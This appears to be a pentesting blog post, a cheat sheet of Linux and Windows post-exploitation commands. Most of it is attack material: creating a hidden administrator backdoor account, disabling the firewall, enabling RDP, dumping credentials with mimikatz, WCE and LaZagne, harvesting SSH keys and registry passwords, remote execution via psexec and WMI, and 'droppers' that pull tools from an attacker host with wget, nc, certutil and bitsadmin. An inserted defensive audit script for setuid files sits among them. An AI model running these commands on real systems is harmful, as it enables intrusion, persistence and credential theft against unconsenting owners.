🥷 The Art of Pentesting: Post-exploitation like an APT
Linux Post-exploitation most common and useful commands
Linux Post-exploitation
Check for insecure permissions:
Find setuid binaries:
find / -perm -4000 -ls 2> /dev/null
Find world-writable files:
find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null
Find world-writable directories:
find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
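As an added example (not part of the original page), the permission checks above bundled into a small bash audit that also diffs the setuid/setgid list against a known-good baseline, so only unexpected entries are reported; the baseline format (one absolute path per line) and the AUDIT_ROOT / AUDIT_BASELINE variables are assumptions of this example.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: bundle the permission checks
# above into reusable functions and diff the setuid/setgid list against a
# known-good baseline so that only unexpected entries are reported.
# The baseline format (one absolute path per line) and the AUDIT_ROOT /
# AUDIT_BASELINE environment variables are assumptions for this example.

# setuid/setgid regular files under $1, skipping /proc and /sys.
list_suid() {
    find "$1" \( -path /proc -o -path /sys \) -prune -o \
        -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# World-writable files and directories under $1 that lack the sticky bit.
# A sticky world-writable directory such as /tmp is expected; a plain
# world-writable file or directory is a finding.
list_world_writable() {
    find "$1" \( -path /proc -o -path /sys \) -prune -o \
        \( -type f -o -type d \) -perm -0002 ! -perm -1000 -print 2>/dev/null | sort
}

# setuid/setgid files under $1 that are absent from baseline file $2.
# grep exits 1 when every entry is in the baseline; that is not an error here.
suid_not_in_baseline() {
    list_suid "$1" | grep -vxFf "$2" || true
}

# Human-readable report: audit_report ROOT [BASELINE]
audit_report() {
    echo "== setuid/setgid files under $1 =="
    list_suid "$1"
    echo "== world-writable files/dirs without sticky bit =="
    list_world_writable "$1"
    if [ -n "${2:-}" ]; then
        echo "== setuid/setgid files not in baseline $2 =="
        suid_not_in_baseline "$1" "$2"
    fi
}

# Stand-alone use: AUDIT_ROOT=/ AUDIT_BASELINE=/etc/suid.baseline ./audit.sh
if [ -n "${AUDIT_ROOT:-}" ]; then
    audit_report "$AUDIT_ROOT" "${AUDIT_BASELINE:-}"
fi
```

Capture the baseline on a freshly built host and re-run the audit periodically; a new setuid binary or a world-writable path outside the sticky temp directories is what you want to see flagged.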
Look for interesting files:
find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null
Check sudo:
sudo su
sudo -l
Inspect (and decrypt) a PKCS#12 object:
openssl pkcs12 -info -in $FILE
Show certs in PKCS#7 file:
openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der
Show keystore content:
keytool -list -v -keystore keystore.jks
Commands for information gathering:
ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu
Find users with shell access:
egrep -e '/bin/(ba)?sh' /etc/passwd
Check bootup services:
ls /etc/rc*
SSH relationships and logins:
cat ~/.ssh/*
Windows Post-exploitation
Check filesystem:
Like “ls -la” in Linux:
dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt
Compute MD5 hash of a file:
Get-FileHash -Algorithm MD5 -Path .\$FILE
Check registry for sensitive strings:
reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt
Check scheduler for vulnerable tasks:
schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt
Other checks:
DRIVERQUERY
Reboot the host (not a check; this restarts the machine):
wmic os where Primary='TRUE' reboot
List installed hotfixes to find missing patches:
wmic qfe
notepad myfile.txt:lion.txt
eventvwr.exe
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts
Wmic commands:
wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get
List SIDs of the system (as admin):
wmic useraccount get name,sid,fullname
Net commands:
net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr
How to set up a backdoor account:
net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add
Check routing/network information:
route print
arp -A
ipconfig /all
getmac
Show file attributes / permissions:
cacls cmd.exe
attrib cmd.exe
List services:
sc queryex type= service state= all
net start
Other info:
systeminfo
whoami
Same on Windows XP:
echo %USERNAME%
Firewall management commands:
netsh firewall show stat
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Disable firewall:
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
RDP
Show RDP sessions:
quser
qwinsta
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"
svchost.exe -k termsvcs
tasklist /svc /S servername /U username /P password
Change RDP daemon status from a Meterpreter session:
msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1
More Meterpreter commands in the following post:
Change RDP port in the Windows Registry:
HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, value PortNumber (REG_DWORD, default 3389)
Remote Execution commands:
wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP
With Sysinternals PsExec:
psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1
Copy a file to the target host AND execute it:
psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp
Authenticated WMI exec via PowerShell with Metasploit:
msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options
Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Universal
msf exploit(windows/local/ps_wmi_exec) >
On the same host, but as another user:
runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"
Windows exploit suggester (OBSOLETE)
WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Tools for information gathering
Manual method
dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts
LaZagne
Download LaZagne from https://github.com/AlessandroZ/LaZagne
laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox
RATs (Remote Administration Tools)
Pupy https://github.com/n1nj4sec/pupy: open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool, mainly written in Python
Sniffers
Sniffers for Windows
Install Wireshark, also use in console dumpcap:
dumpcap -D
dumpcap -i $IFACE
Keyloggers for Windows
Windows keylogger (no admin rights):
To cross-compile it for Windows:
i686-w64-mingw32-g++ klog_main.cpp -o klog -static
Network sniffers for Linux
tcpdump -X -s 0 -i $INTERFACE
Password dumping
mimikatz
mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv
Fgdump
Dumps hashes (needs SYSTEM privileges)
fgdump.exe
WCE (Windows Credential Editor)
Dumps cleartext passwords:
wce -w
Dumps hashes:
wce
Persistent mode, writes to credentials.txt:
wce -r
Change your credentials in memory:
wce -s
Droppers
Droppers are programs that let you download tools, Trojans, etc. to the target machine in order to continue the compromise locally.
Droppers using Linux
wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE root@$IP:~
Droppers using Windows
Powershell
curl -Uri $URL -OutFile $FILE
See also Powercat.
ROBOCOPY
NET USE \\$IP\IPC$ /USER:DOMAIN\USER
ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
NET USE \\$IP\IPC$ /D
BITSAdmin
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
Direct Transfer:
bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
Using a download queue:
bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
Certutil
certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad
notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Examples:
hh.exe C:\windows\system32\calc.exe
Built-in C# compiler:
csc.exe
Droppers using known protocols
HTTP
Python2
python -m SimpleHTTPServer
python -m SimpleHTTPServer 80
Python3
python3 -m http.server 8080
PHP
php -S localhost:8000
Ruby
ruby -run -e httpd . -p 8000
FTP
pip install pyftpdlib
python -m pyftpdlib
SMB
impacket-smbserver PAYLOADS /root/payload